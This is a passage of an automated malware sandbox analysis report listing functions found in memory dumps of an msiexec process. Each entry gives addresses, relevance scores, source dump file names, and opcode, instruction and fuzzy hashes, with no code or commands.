                                                                              • Opcode ID: a530a8e94c9f4d5332876a64b62ec6e95834f01ba3a217f80ba584e435c64799
                                                                              • Instruction ID: 6c83d2f5e8d360b95987721fbb6011c64bb33a58fbdf9a04edfeab21705269c9
                                                                              • Opcode Fuzzy Hash: a530a8e94c9f4d5332876a64b62ec6e95834f01ba3a217f80ba584e435c64799
                                                                              • Instruction Fuzzy Hash: B5F10870A081199FCB25CF69C984AEDBFF6BF88311F658469E805AB3A1D730ED41DB50
                                                                              Function 24970040 Relevance: .6, Instructions: 596COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 92cd75963871ecb4026aaf44a266278fa51de13a13a59e001b2349d4ac6c1ee4
                                                                              • Instruction ID: 9e62309e89615dd09ed9680e4c552047ca5228adde4d0e49a31be4a9df0a443d
                                                                              • Opcode Fuzzy Hash: 92cd75963871ecb4026aaf44a266278fa51de13a13a59e001b2349d4ac6c1ee4
                                                                              • Instruction Fuzzy Hash: 7952AA74E01228CFDB64DF69C984B9DBBB2BB88300F1085E9D809A7255DB359E85CF50
                                                                              Function 2497CCA0 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e7fb1eada882354ac560070acb74afef1b8241df732055fb28dcc7ed845195f5
                                                                              • Instruction ID: 5f95cdb73c24c1502f3bf2517cecd73ca40895bde7c0d00314901a0878e990d3
                                                                              • Opcode Fuzzy Hash: e7fb1eada882354ac560070acb74afef1b8241df732055fb28dcc7ed845195f5
                                                                              • Instruction Fuzzy Hash: F7C1B074E00218CFEB14DFA5C954B9DBBB6FF89300F2081A9D808AB369DB355A85CF50
                                                                              Function 2497D0F8 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db1e128bd2f306f1b334fd16c30601d5296ed8e5293df9ce7024432aa0d3fb10
                                                                              • Instruction ID: 428ae824fd1b1da90e5e6e8874b2f9a8c5d6bd96115f9087c4598f90877a646d
                                                                              • Opcode Fuzzy Hash: db1e128bd2f306f1b334fd16c30601d5296ed8e5293df9ce7024432aa0d3fb10
                                                                              • Instruction Fuzzy Hash: 65C1B274E00218CFDB14DFA5C954B9DBBB6FF89300F1081A9D809AB3A9DB355A85CF50
                                                                              Function 2497F810 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 53ac27bb76c724cc30f08684ef6e28d233b734b7b1ac5bab6646daca6bac71ab
                                                                              • Instruction ID: 15f7592b38a40bba33917e5310659c0421767383d8872b6f9b442c522fba0174
                                                                              • Opcode Fuzzy Hash: 53ac27bb76c724cc30f08684ef6e28d233b734b7b1ac5bab6646daca6bac71ab
                                                                              • Instruction Fuzzy Hash: 02C1B174E01218CFDB14DFA5C994B9DBBB6FF89300F2081A9D809AB369DB345A85CF50
                                                                              Function 2497D9A8 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b127d6edc7599e4ca506de698b72a896488f9370181cff378c3f4c8c1c0b52e
                                                                              • Instruction ID: 3a84fbd2179e663708fb6506867b0fb92b193e625a9f52ed186600b90fae3e73
                                                                              • Opcode Fuzzy Hash: 5b127d6edc7599e4ca506de698b72a896488f9370181cff378c3f4c8c1c0b52e
                                                                              • Instruction Fuzzy Hash: 34C1B174E00218CFDB14DFA9C954B9DBBB6FF89300F1085A9D808AB3A9DB355A85CF50
                                                                              Function 2497D550 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1dc22eb6bd3368d15f13432a250a7883395bca666672a2f4acb164a7910d6de6
                                                                              • Instruction ID: b1d96074d3011039c88756ae016867b0981acd1bcb273d2e76f845e60e104d22
                                                                              • Opcode Fuzzy Hash: 1dc22eb6bd3368d15f13432a250a7883395bca666672a2f4acb164a7910d6de6
                                                                              • Instruction Fuzzy Hash: 3DC1B2B4E01218CFDB14DFA5C994B9DBBB6FF89300F1081A9D809AB399DB355A85CF10
                                                                              Function 2497E6B0 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c2ca6cbe4e2129c54ee564587a33a85bba37d821e8feec548cfcd0b40f0fffc
                                                                              • Instruction ID: 385874877d55559f716ded5e3b21e6fb103fac33c0504c58ef41dfd1a4a9c8bb
                                                                              • Opcode Fuzzy Hash: 6c2ca6cbe4e2129c54ee564587a33a85bba37d821e8feec548cfcd0b40f0fffc
                                                                              • Instruction Fuzzy Hash: 53C1A174E00218CFEB14DFA5C994B9DBBB6FF89300F1085A9D809AB369DB355A85CF50
                                                                              Function 2497DE00 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8ed3b676bd35f19d30fa611fa9d32efc2d78fad87d905773fbe8da669927071e
                                                                              • Instruction ID: 2e713deaf68d611a3f600b7db98a5964af76b17bac1c45f7297b701bb80e0fb6
                                                                              • Opcode Fuzzy Hash: 8ed3b676bd35f19d30fa611fa9d32efc2d78fad87d905773fbe8da669927071e
                                                                              • Instruction Fuzzy Hash: 93C1A0B4E01218CFDB14DFA5C954B9DBBB6FF89300F1085A9D808AB369DB355A85CF50
                                                                              Function 2497E258 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 82653b221be958dcb90cfe6fc261e471b4b0b123e286ae1896f6a5b788b2642c
                                                                              • Instruction ID: e15489954147acd79276eba4ba7788a5b76aca1f9809d322d7e9c378bf5f3fb6
                                                                              • Opcode Fuzzy Hash: 82653b221be958dcb90cfe6fc261e471b4b0b123e286ae1896f6a5b788b2642c
                                                                              • Instruction Fuzzy Hash: C1C1A174E00218CFEB14DFA5C994B9DBBB6FF89300F1085A9D808AB369DB355A85CF10
                                                                              Function 2497F3B8 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b5e508a979f747ea1c2e01ce599d0e29c818d9da1a92a7649ecfb449d11c185
                                                                              • Instruction ID: 11e98853319404d9fde969c3481d44bde6ae167c715a0de573971521426c1f88
                                                                              • Opcode Fuzzy Hash: 9b5e508a979f747ea1c2e01ce599d0e29c818d9da1a92a7649ecfb449d11c185
                                                                              • Instruction Fuzzy Hash: DCC1B174E00218CFDB14DFA5C994B9DBBB6FF89300F2081A9D809AB369DB355A85CF50
                                                                              Function 2497EB08 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d4bfc35acda38d573640761d7073f407cbdd7700181e2904a8ddefefb4d83be2
                                                                              • Instruction ID: 7b7a0e12f7b4e07b0b1991298b9d0908ee1eebe63e79469cc3e1e61fcdf048ab
                                                                              • Opcode Fuzzy Hash: d4bfc35acda38d573640761d7073f407cbdd7700181e2904a8ddefefb4d83be2
                                                                              • Instruction Fuzzy Hash: 6EC1A0B4E00218CFEB14DFA5C954B9DBBB6FF89300F1085A9D809AB369DB355A85CF50
                                                                              Function 2497EF60 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8726df74d0ed1980399ecc2a39ec012141d158fc0ef41cce86ae81a7a7600c26
                                                                              • Instruction ID: 08f6d9553442e6b9d38cca30e5082da55f5f9fc4adef793352baab7b01e1aadd
                                                                              • Opcode Fuzzy Hash: 8726df74d0ed1980399ecc2a39ec012141d158fc0ef41cce86ae81a7a7600c26
                                                                              • Instruction Fuzzy Hash: 4CC1A174E00218CFEB14DFA5C954B9DBBB6FF89300F2085A9D809AB369DB355A85CF50
                                                                              Function 24970673 Relevance: .2, Instructions: 193COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c19014ec179cf018dccd7da698fb2f11190f7963bb9a0f8dbd6338b968585b8
                                                                              • Instruction ID: 210d94c6f84bcecd9d9caba09456c2c97a28c88f99b396c9b50be05f1ead6f03
                                                                              • Opcode Fuzzy Hash: 3c19014ec179cf018dccd7da698fb2f11190f7963bb9a0f8dbd6338b968585b8
                                                                              • Instruction Fuzzy Hash: 23A19D74A01228CFDB65DF24C954BDABBB2BF89300F5085EAD80DA7254DB359E81CF51
                                                                              Function 24970853 Relevance: .1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: de80657afbb86bc2ede1ab3855966f877c55c50c3560cd8800ed07b9768dd295
                                                                              • Instruction ID: 7d083157f94b389f6000173c43ec6cf14dcc741f934c8bb08fd6b77278cc3e7a
                                                                              • Opcode Fuzzy Hash: de80657afbb86bc2ede1ab3855966f877c55c50c3560cd8800ed07b9768dd295
                                                                              • Instruction Fuzzy Hash: 01519E74A41228CFCB65DF24C954B9ABBB2FF4A301F5085E9D809A7364DB359E81CF50
                                                                              Function 005B6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \;jq$\;jq$\;jq$\;jq
                                                                              • API String ID: 0-138087212
                                                                              • Opcode ID: d25cd53425996dda275e99201ce5fbe0ac3dba0ee13f8d300b5c27fb56086a66
                                                                              • Instruction ID: 272959f2b02f5b89bc7ed17e415e04a3791b107519349d8960a1166d536d5078
                                                                              • Opcode Fuzzy Hash: d25cd53425996dda275e99201ce5fbe0ac3dba0ee13f8d300b5c27fb56086a66
                                                                              • Instruction Fuzzy Hash: C7018B317402158FCB248E2DC540AA67BEBBF98760725457AE406CB3B4DE35FC418791